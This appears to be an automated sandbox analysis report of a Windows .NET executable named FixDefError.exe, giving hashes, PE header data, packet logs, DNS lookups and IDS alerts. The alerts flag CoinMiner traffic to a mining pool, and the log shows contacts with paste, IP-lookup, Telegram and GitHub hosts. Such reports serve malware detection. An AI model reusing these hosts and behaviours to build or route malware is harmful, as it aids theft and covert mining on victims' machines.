                                                                                                                  SSDEEP:24:iyHCgHveQdw0d7YLqwx3DpWiO0cBCcH5y8d+M5:iyiEz77YLqGEiaBJYM
                                                                                                                  MD5:D80CBDF7FBA88ECF7F28F4CD6304B315
                                                                                                                  SHA1:D5AC6E2C716E522E65194289D6A2E381C7E40D4F
                                                                                                                  SHA-256:F4CB8536FB87529314794A5E826930DF121436D04E52F2EEB868CBAFF6E4BE01
                                                                                                                  SHA-512:30A9015929C335A82E85BE067D6624BE68C7B288BF3C0D4A4A6190A1A62D1E3321AFA3943E0EF4B7BF2374374C327E785D806E2D919CA4905D778A6B1192B5CC
                                                                                                                  Malicious:false
                                                                                                                  Preview:91Kuym2o0uO1/JlBTKuGYsxlDwJ2KhbLg7HsEo2BQs3wRIgYtyArhVGuksyXMLWdzr4Q+6X5BXNhuPoIAW6EEcKLi4dltHqfZkJ75+yYf8gnQpCiCV5v940icl4TuX6Tvg9kmbSMbhq6z5AUIVj25RFurUUq5bphUJVFS5KIoNB4QTSK1c1nDqg=..0WYkiYGW5Edi+bvRlMTlg+9tKzAf6jFXVuenq9wOhLZqcmOBpKkBojF/Dgg2JARga43C4vNTSf5p8b+RhJHOH7dvj21cEblamTWQP4PeTAo7zTUycNhOsy6ie6HLzP1yS7HYD2m+i7kVIzhOUeEgjnsjQiUpT2/DLOgRDkFEQJr1AmjCOsIwh1+QoPo0dj93eog9eKccnPkwNCSgTuqo7emoyvIeKyO8mJkhCPpjpAlxMlIyU6NENUqTyeKlUb1IOElYGYfcNZxMKDDoQ0Lx7Ft1A0u6QqkQCVin0QkaUsFxvb7DEDcyFPsXQaUB4KCAKBsrBcVAsXSjOew7YJh1LavFo9vAzebVDGwWyCKVMRcym0AmZFznpN84upYfOxnFVQYldwSf1OCxr+NWnmz032Ht98zrhDMBubZHTARjjP5LSZLiVk7M5f/kltzQaHYhzbzbGUhJZlZ7SzGriJiGi/rgnUQdeKGOHQ==..KyDTvW5GhLdanpKLz21nhq5NL+Rc0RCZwkL4YQ8lbbvGt3Y0EesDT13+bgpfkEEC+fod0jDQUy/oMfMFwROck7ZLTHjPFCisZC7PtCbO0GaZw4M67/eC2YJkmwbGuJReab1bOE/Wmhpy55AcAAKwf+gc3i5Q4x5abIp+ioFlrd7SrFrC1lwXaNlJHRISaGykUPsppIXd+zRpyCUHpseK/GxMk322Y9a2Ug==..1..171010202..

                                                                                                                  Static File Info

                                                                                                                  General

                                                                                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Entropy (8bit):5.7415841018358895
                                                                                                                  TrID:
                                                                                                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                                  • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                  • DOS Executable Generic (2002/1) 0.01%
                                                                                                                  File name:FixDefError.exe
                                                                                                                  File size:2393088
                                                                                                                  MD5:1b664f2a0bede6c47e44ca8c0aad3de7
                                                                                                                  SHA1:2dc3169220411d03be438047a3c33696b4371d2b
                                                                                                                  SHA256:908641c2c756b0a2762e4883f7defb050e1baa09d44be8cdad34c5aa562d65d9
                                                                                                                  SHA512:f22f43e7609cbf97b5436e8185f146099ab2706f76ea0dffd3bbac20c4c940e1eda560b84ea457307ace8951234de51a3925f67fd6c47cf0917d491fded105e9
                                                                                                                  SSDEEP:24576:d6XFr/AUXPhtHbLLGpMamGEhP+boT/JsGz1UdbA4ZWIWId4gIehzsBgxUsHB:docUPht7XGpMjTPd/J7y5Bd/nv/
                                                                                                                  TLSH:4EB5BF2439FA601EB173EF668BE478E6DA6FB7733B07645A1051038A4723981DEC153E
                                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....n............"...0..x$...........$.. ....$...@.. ........................$...........`................................

                                                                                                                  File Icon

                                                                                                                  Icon Hash:00828e8e8686b000

                                                                                                                  Static PE Info

                                                                                                                  General

                                                                                                                  Entrypoint:0x6497ce
                                                                                                                  Entrypoint Section:.text
                                                                                                                  Digitally signed:false
                                                                                                                  Imagebase:0x400000
                                                                                                                  Subsystem:windows gui
                                                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                  DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                  Time Stamp:0xDBB16EC1 [Sat Oct 19 04:02:09 2086 UTC]
                                                                                                                  TLS Callbacks:
                                                                                                                  CLR (.Net) Version:
                                                                                                                  OS Version Major:4
                                                                                                                  OS Version Minor:0
                                                                                                                  File Version Major:4
                                                                                                                  File Version Minor:0
                                                                                                                  Subsystem Version Major:4
                                                                                                                  Subsystem Version Minor:0
                                                                                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                                  Entrypoint Preview

                                                                                                                  Instruction
                                                                                                                  jmp dword ptr [00402000h]
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al

                                                                                                                  Data Directories

                                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x24977c0x4f.text
                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x24a0000x6c2.rsrc
                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x24c0000xc.reloc
                                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x2497300x1c.text
                                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                  Sections

                                                                                                                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                  .text0x20000x2477d40x247800unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                  .rsrc0x24a0000x6c20x800False0.359375data3.7216609270407237IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                  .reloc0x24c0000xc0x200False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                  Resources

                                                                                                                  NameRVASizeTypeLanguageCountry
                                                                                                                  RT_VERSION0x24a0a00x438data
                                                                                                                  RT_MANIFEST0x24a4d80x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators

                                                                                                                  Imports

                                                                                                                  DLLImport
                                                                                                                  mscoree.dll_CorExeMain

                                                                                                                  Network Behavior

                                                                                                                  Snort IDS Alerts

                                                                                                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                  192.168.2.38.8.8.849977532036289 03/19/23-00:18:14.932574UDP2036289ET TROJAN CoinMiner Domain in DNS Lookup (pool .hashvault .pro)4997753192.168.2.38.8.8.8
                                                                                                                  192.168.2.395.179.241.203496974432831812 03/19/23-00:18:15.028582TCP2831812ETPRO TROJAN CoinMiner Known Malicious Stratum Authline (2018-07-16 8)49697443192.168.2.395.179.241.203
                                                                                                                  192.168.2.395.179.241.203496964432831812 03/19/23-00:18:02.289189TCP2831812ETPRO TROJAN CoinMiner Known Malicious Stratum Authline (2018-07-16 8)49696443192.168.2.395.179.241.203
                                                                                                                  192.168.2.38.8.8.862704532036289 03/19/23-00:18:02.189431UDP2036289ET TROJAN CoinMiner Domain in DNS Lookup (pool .hashvault .pro)6270453192.168.2.38.8.8.8

                                                                                                                  Network Port Distribution

                                                                                                                  TCP Packets

                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                  Mar 19, 2023 00:17:10.409070015 CET4968480192.168.2.3142.251.209.36
                                                                                                                  Mar 19, 2023 00:17:10.430979013 CET8049684142.251.209.36192.168.2.3
                                                                                                                  Mar 19, 2023 00:17:10.431353092 CET4968480192.168.2.3142.251.209.36
                                                                                                                  Mar 19, 2023 00:17:10.440994024 CET4968480192.168.2.3142.251.209.36
                                                                                                                  Mar 19, 2023 00:17:10.462990046 CET8049684142.251.209.36192.168.2.3
                                                                                                                  Mar 19, 2023 00:17:10.521131992 CET8049684142.251.209.36192.168.2.3
                                                                                                                  Mar 19, 2023 00:17:10.521212101 CET8049684142.251.209.36192.168.2.3
                                                                                                                  Mar 19, 2023 00:17:10.521285057 CET8049684142.251.209.36192.168.2.3
                                                                                                                  Mar 19, 2023 00:17:10.521346092 CET8049684142.251.209.36192.168.2.3
                                                                                                                  Mar 19, 2023 00:17:10.521374941 CET4968480192.168.2.3142.251.209.36
                                                                                                                  Mar 19, 2023 00:17:10.521408081 CET4968480192.168.2.3142.251.209.36
                                                                                                                  Mar 19, 2023 00:17:10.521408081 CET8049684142.251.209.36192.168.2.3
                                                                                                                  Mar 19, 2023 00:17:10.521469116 CET8049684142.251.209.36192.168.2.3
                                                                                                                  Mar 19, 2023 00:17:10.521528959 CET8049684142.251.209.36192.168.2.3
                                                                                                                  Mar 19, 2023 00:17:10.521588087 CET8049684142.251.209.36192.168.2.3
                                                                                                                  Mar 19, 2023 00:17:10.521589041 CET4968480192.168.2.3142.251.209.36
                                                                                                                  Mar 19, 2023 00:17:10.521645069 CET4968480192.168.2.3142.251.209.36
                                                                                                                  Mar 19, 2023 00:17:10.521647930 CET8049684142.251.209.36192.168.2.3
                                                                                                                  Mar 19, 2023 00:17:10.521711111 CET8049684142.251.209.36192.168.2.3
                                                                                                                  Mar 19, 2023 00:17:10.521770000 CET4968480192.168.2.3142.251.209.36
                                                                                                                  Mar 19, 2023 00:17:10.543534994 CET8049684142.251.209.36192.168.2.3
                                                                                                                  Mar 19, 2023 00:17:10.543621063 CET8049684142.251.209.36192.168.2.3
                                                                                                                  Mar 19, 2023 00:17:10.543756008 CET4968480192.168.2.3142.251.209.36
                                                                                                                  Mar 19, 2023 00:17:10.544174910 CET8049684142.251.209.36192.168.2.3
                                                                                                                  Mar 19, 2023 00:17:10.544246912 CET8049684142.251.209.36192.168.2.3
                                                                                                                  Mar 19, 2023 00:17:10.545268059 CET4968480192.168.2.3142.251.209.36
                                                                                                                  Mar 19, 2023 00:17:10.545730114 CET8049684142.251.209.36192.168.2.3
                                                                                                                  Mar 19, 2023 00:17:10.545789957 CET8049684142.251.209.36192.168.2.3
                                                                                                                  Mar 19, 2023 00:17:10.547324896 CET8049684142.251.209.36192.168.2.3
                                                                                                                  Mar 19, 2023 00:17:10.547405958 CET8049684142.251.209.36192.168.2.3
                                                                                                                  Mar 19, 2023 00:17:10.547442913 CET4968480192.168.2.3142.251.209.36
                                                                                                                  Mar 19, 2023 00:17:10.547493935 CET4968480192.168.2.3142.251.209.36
                                                                                                                  Mar 19, 2023 00:17:10.548921108 CET8049684142.251.209.36192.168.2.3
                                                                                                                  Mar 19, 2023 00:17:10.548985004 CET8049684142.251.209.36192.168.2.3
                                                                                                                  Mar 19, 2023 00:17:10.549072027 CET4968480192.168.2.3142.251.209.36
                                                                                                                  Mar 19, 2023 00:17:10.550436020 CET8049684142.251.209.36192.168.2.3
                                                                                                                  Mar 19, 2023 00:17:10.550498962 CET8049684142.251.209.36192.168.2.3
                                                                                                                  Mar 19, 2023 00:17:10.550740004 CET4968480192.168.2.3142.251.209.36
                                                                                                                  Mar 19, 2023 00:17:10.552064896 CET8049684142.251.209.36192.168.2.3
                                                                                                                  Mar 19, 2023 00:17:10.552129030 CET8049684142.251.209.36192.168.2.3
                                                                                                                  Mar 19, 2023 00:17:10.552242041 CET4968480192.168.2.3142.251.209.36
                                                                                                                  Mar 19, 2023 00:17:10.553538084 CET8049684142.251.209.36192.168.2.3
                                                                                                                  Mar 19, 2023 00:17:10.553601980 CET8049684142.251.209.36192.168.2.3
                                                                                                                  Mar 19, 2023 00:17:10.555124998 CET8049684142.251.209.36192.168.2.3
                                                                                                                  Mar 19, 2023 00:17:10.555186987 CET8049684142.251.209.36192.168.2.3
                                                                                                                  Mar 19, 2023 00:17:10.555222034 CET4968480192.168.2.3142.251.209.36
                                                                                                                  Mar 19, 2023 00:17:10.555248022 CET4968480192.168.2.3142.251.209.36
                                                                                                                  Mar 19, 2023 00:17:10.556705952 CET8049684142.251.209.36192.168.2.3
                                                                                                                  Mar 19, 2023 00:17:10.556771040 CET8049684142.251.209.36192.168.2.3
                                                                                                                  Mar 19, 2023 00:17:10.557624102 CET4968480192.168.2.3142.251.209.36
                                                                                                                  Mar 19, 2023 00:17:10.565504074 CET8049684142.251.209.36192.168.2.3
                                                                                                                  Mar 19, 2023 00:17:10.565566063 CET8049684142.251.209.36192.168.2.3
                                                                                                                  Mar 19, 2023 00:17:10.565655947 CET4968480192.168.2.3142.251.209.36
                                                                                                                  Mar 19, 2023 00:17:10.566277981 CET8049684142.251.209.36192.168.2.3
                                                                                                                  Mar 19, 2023 00:17:10.566339016 CET8049684142.251.209.36192.168.2.3
                                                                                                                  Mar 19, 2023 00:17:10.566421032 CET4968480192.168.2.3142.251.209.36
                                                                                                                  Mar 19, 2023 00:17:10.567838907 CET8049684142.251.209.36192.168.2.3
                                                                                                                  Mar 19, 2023 00:17:10.568615913 CET8049684142.251.209.36192.168.2.3
                                                                                                                  Mar 19, 2023 00:17:10.568675995 CET8049684142.251.209.36192.168.2.3
                                                                                                                  Mar 19, 2023 00:17:10.568686962 CET4968480192.168.2.3142.251.209.36
                                                                                                                  Mar 19, 2023 00:17:10.570116997 CET8049684142.251.209.36192.168.2.3
                                                                                                                  Mar 19, 2023 00:17:10.570177078 CET8049684142.251.209.36192.168.2.3
                                                                                                                  Mar 19, 2023 00:17:10.570257902 CET4968480192.168.2.3142.251.209.36
                                                                                                                  Mar 19, 2023 00:17:10.571569920 CET8049684142.251.209.36192.168.2.3
                                                                                                                  Mar 19, 2023 00:17:10.571667910 CET4968480192.168.2.3142.251.209.36
                                                                                                                  Mar 19, 2023 00:17:12.163043022 CET49685443192.168.2.3198.251.88.130
                                                                                                                  Mar 19, 2023 00:17:12.163110018 CET44349685198.251.88.130192.168.2.3
                                                                                                                  Mar 19, 2023 00:17:12.163212061 CET49685443192.168.2.3198.251.88.130
                                                                                                                  Mar 19, 2023 00:17:12.213521004 CET49685443192.168.2.3198.251.88.130
                                                                                                                  Mar 19, 2023 00:17:12.213567019 CET44349685198.251.88.130192.168.2.3
                                                                                                                  Mar 19, 2023 00:17:12.360888004 CET44349685198.251.88.130192.168.2.3
                                                                                                                  Mar 19, 2023 00:17:12.361067057 CET49685443192.168.2.3198.251.88.130
                                                                                                                  Mar 19, 2023 00:17:12.363429070 CET49685443192.168.2.3198.251.88.130
                                                                                                                  Mar 19, 2023 00:17:12.363455057 CET44349685198.251.88.130192.168.2.3
                                                                                                                  Mar 19, 2023 00:17:12.363789082 CET44349685198.251.88.130192.168.2.3
                                                                                                                  Mar 19, 2023 00:17:12.413872004 CET49685443192.168.2.3198.251.88.130
                                                                                                                  Mar 19, 2023 00:17:12.706437111 CET49685443192.168.2.3198.251.88.130
                                                                                                                  Mar 19, 2023 00:17:12.706497908 CET44349685198.251.88.130192.168.2.3
                                                                                                                  Mar 19, 2023 00:17:12.763334036 CET44349685198.251.88.130192.168.2.3
                                                                                                                  Mar 19, 2023 00:17:12.763386011 CET44349685198.251.88.130192.168.2.3
                                                                                                                  Mar 19, 2023 00:17:12.763463974 CET49685443192.168.2.3198.251.88.130
                                                                                                                  Mar 19, 2023 00:17:12.763497114 CET44349685198.251.88.130192.168.2.3
                                                                                                                  Mar 19, 2023 00:17:12.763529062 CET44349685198.251.88.130192.168.2.3
                                                                                                                  Mar 19, 2023 00:17:12.763586998 CET49685443192.168.2.3198.251.88.130
                                                                                                                  Mar 19, 2023 00:17:12.764307976 CET49685443192.168.2.3198.251.88.130
                                                                                                                  Mar 19, 2023 00:17:12.889744997 CET49686443192.168.2.3104.237.62.211
                                                                                                                  Mar 19, 2023 00:17:12.889807940 CET44349686104.237.62.211192.168.2.3
                                                                                                                  Mar 19, 2023 00:17:12.889905930 CET49686443192.168.2.3104.237.62.211
                                                                                                                  Mar 19, 2023 00:17:12.890579939 CET49686443192.168.2.3104.237.62.211
                                                                                                                  Mar 19, 2023 00:17:12.890614986 CET44349686104.237.62.211192.168.2.3
                                                                                                                  Mar 19, 2023 00:17:13.597297907 CET44349686104.237.62.211192.168.2.3
                                                                                                                  Mar 19, 2023 00:17:13.597415924 CET49686443192.168.2.3104.237.62.211
                                                                                                                  Mar 19, 2023 00:17:13.600300074 CET49686443192.168.2.3104.237.62.211
                                                                                                                  Mar 19, 2023 00:17:13.600327969 CET44349686104.237.62.211192.168.2.3
                                                                                                                  Mar 19, 2023 00:17:13.600667000 CET44349686104.237.62.211192.168.2.3
                                                                                                                  Mar 19, 2023 00:17:13.602973938 CET49686443192.168.2.3104.237.62.211
                                                                                                                  Mar 19, 2023 00:17:13.603012085 CET44349686104.237.62.211192.168.2.3
                                                                                                                  Mar 19, 2023 00:17:13.965936899 CET44349686104.237.62.211192.168.2.3
                                                                                                                  Mar 19, 2023 00:17:13.966052055 CET44349686104.237.62.211192.168.2.3
                                                                                                                  Mar 19, 2023 00:17:13.966156960 CET49686443192.168.2.3104.237.62.211

                                                                                                                  UDP Packets

                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                  Mar 19, 2023 00:17:10.358745098 CET5897453192.168.2.38.8.8.8
                                                                                                                  Mar 19, 2023 00:17:10.397644997 CET53589748.8.8.8192.168.2.3
                                                                                                                  Mar 19, 2023 00:17:12.141326904 CET6372253192.168.2.38.8.8.8
                                                                                                                  Mar 19, 2023 00:17:12.161010981 CET53637228.8.8.8192.168.2.3
                                                                                                                  Mar 19, 2023 00:17:12.825360060 CET6552253192.168.2.38.8.8.8
                                                                                                                  Mar 19, 2023 00:17:12.844556093 CET53655228.8.8.8192.168.2.3
                                                                                                                  Mar 19, 2023 00:17:12.863749981 CET5986953192.168.2.38.8.8.8
                                                                                                                  Mar 19, 2023 00:17:12.883479118 CET53598698.8.8.8192.168.2.3
                                                                                                                  Mar 19, 2023 00:17:13.983597040 CET5439753192.168.2.38.8.8.8
                                                                                                                  Mar 19, 2023 00:17:14.000703096 CET53543978.8.8.8192.168.2.3
                                                                                                                  Mar 19, 2023 00:17:21.492362022 CET5932453192.168.2.38.8.8.8
                                                                                                                  Mar 19, 2023 00:17:21.519740105 CET53593248.8.8.8192.168.2.3
                                                                                                                  Mar 19, 2023 00:17:21.815330982 CET5901453192.168.2.38.8.8.8
                                                                                                                  Mar 19, 2023 00:17:21.834188938 CET53590148.8.8.8192.168.2.3
                                                                                                                  Mar 19, 2023 00:17:51.195936918 CET6162653192.168.2.38.8.8.8
                                                                                                                  Mar 19, 2023 00:17:51.215842962 CET53616268.8.8.8192.168.2.3
                                                                                                                  Mar 19, 2023 00:17:51.850929976 CET6178753192.168.2.38.8.8.8
                                                                                                                  Mar 19, 2023 00:17:51.870831966 CET53617878.8.8.8192.168.2.3
                                                                                                                  Mar 19, 2023 00:17:59.379724979 CET5892153192.168.2.38.8.8.8
                                                                                                                  Mar 19, 2023 00:17:59.399435043 CET53589218.8.8.8192.168.2.3

                                                                                                                  DNS Queries

                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                  Mar 19, 2023 00:17:10.358745098 CET192.168.2.38.8.8.80xb62Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                  Mar 19, 2023 00:17:12.141326904 CET192.168.2.38.8.8.80x6fbcStandard query (0)rentry.coA (IP address)IN (0x0001)false
                                                                                                                  Mar 19, 2023 00:17:12.825360060 CET192.168.2.38.8.8.80xdddcStandard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                                                  Mar 19, 2023 00:17:12.863749981 CET192.168.2.38.8.8.80x21f9Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                                                  Mar 19, 2023 00:17:13.983597040 CET192.168.2.38.8.8.80x5ee0Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                                  Mar 19, 2023 00:17:21.492362022 CET192.168.2.38.8.8.80x4366Standard query (0)github.comA (IP address)IN (0x0001)false
                                                                                                                  Mar 19, 2023 00:17:21.815330982 CET192.168.2.38.8.8.80x921eStandard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)false
                                                                                                                  Mar 19, 2023 00:17:51.195936918 CET192.168.2.38.8.8.80x2aabStandard query (0)rentry.coA (IP address)IN (0x0001)false
                                                                                                                  Mar 19, 2023 00:17:51.850929976 CET192.168.2.38.8.8.80x599aStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                  Mar 19, 2023 00:17:59.379724979 CET192.168.2.38.8.8.80xa230Standard query (0)rentry.coA (IP address)IN (0x0001)false

                                                                                                                  DNS Answers

                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                  Mar 19, 2023 00:17:10.397644997 CET8.8.8.8192.168.2.30xb62No error (0)www.google.com142.251.209.36A (IP address)IN (0x0001)false
                                                                                                                  Mar 19, 2023 00:17:12.161010981 CET8.8.8.8192.168.2.30x6fbcNo error (0)rentry.co198.251.88.130A (IP address)IN (0x0001)false
                                                                                                                  Mar 19, 2023 00:17:12.844556093 CET8.8.8.8192.168.2.30xdddcNo error (0)api.ipify.orgapi4.ipify.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                  Mar 19, 2023 00:17:12.844556093 CET8.8.8.8192.168.2.30xdddcNo error (0)api4.ipify.org104.237.62.211A (IP address)IN (0x0001)false
                                                                                                                  Mar 19, 2023 00:17:12.844556093 CET8.8.8.8192.168.2.30xdddcNo error (0)api4.ipify.org173.231.16.76A (IP address)IN (0x0001)false
                                                                                                                  Mar 19, 2023 00:17:12.844556093 CET8.8.8.8192.168.2.30xdddcNo error (0)api4.ipify.org64.185.227.155A (IP address)IN (0x0001)false
                                                                                                                  Mar 19, 2023 00:17:12.883479118 CET8.8.8.8192.168.2.30x21f9No error (0)api.ipify.orgapi4.ipify.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                  Mar 19, 2023 00:17:12.883479118 CET8.8.8.8192.168.2.30x21f9No error (0)api4.ipify.org64.185.227.155A (IP address)IN (0x0001)false
                                                                                                                  Mar 19, 2023 00:17:12.883479118 CET8.8.8.8192.168.2.30x21f9No error (0)api4.ipify.org104.237.62.211A (IP address)IN (0x0001)false
                                                                                                                  Mar 19, 2023 00:17:12.883479118 CET8.8.8.8192.168.2.30x21f9No error (0)api4.ipify.org173.231.16.76A (IP address)IN (0x0001)false
                                                                                                                  Mar 19, 2023 00:17:14.000703096 CET8.8.8.8192.168.2.30x5ee0No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                                  Mar 19, 2023 00:17:21.519740105 CET8.8.8.8192.168.2.30x4366No error (0)github.com140.82.121.3A (IP address)IN (0x0001)false
                                                                                                                  Mar 19, 2023 00:17:21.834188938 CET8.8.8.8192.168.2.30x921eNo error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                                                                                                                  Mar 19, 2023 00:17:21.834188938 CET8.8.8.8192.168.2.30x921eNo error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                                                                                                                  Mar 19, 2023 00:17:21.834188938 CET8.8.8.8192.168.2.30x921eNo error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                                                                                                                  Mar 19, 2023 00:17:21.834188938 CET8.8.8.8192.168.2.30x921eNo error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                                                                                                                  Mar 19, 2023 00:17:51.215842962 CET8.8.8.8192.168.2.30x2aabNo error (0)rentry.co198.251.88.130A (IP address)IN (0x0001)false
                                                                                                                  Mar 19, 2023 00:17:51.870831966 CET8.8.8.8192.168.2.30x599aNo error (0)www.google.com142.251.209.36A (IP address)IN (0x0001)false
                                                                                                                  Mar 19, 2023 00:17:59.399435043 CET8.8.8.8192.168.2.30xa230No error (0)rentry.co198.251.88.130A (IP address)IN (0x0001)false

                                                                                                                  HTTP Request Dependency Graph

                                                                                                                  • rentry.co
                                                                                                                  • api.ipify.org
                                                                                                                  • api.telegram.org
                                                                                                                  • github.com
                                                                                                                  • raw.githubusercontent.com
                                                                                                                  • www.google.com

                                                                                                                  Statistics

                                                                                                                  Behavior

                                                                                                                  Click to jump to process

                                                                                                                  System Behavior

                                                                                                                  General

                                                                                                                  Target ID:0
                                                                                                                  Start time:00:17:02
                                                                                                                  Start date:19/03/2023
                                                                                                                  Path:C:\Users\user\Desktop\FixDefError.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:C:\Users\user\Desktop\FixDefError.exe
                                                                                                                  Imagebase:0x560000
                                                                                                                  File size:2393088 bytes
                                                                                                                  MD5 hash:1B664F2A0BEDE6C47E44CA8C0AAD3DE7
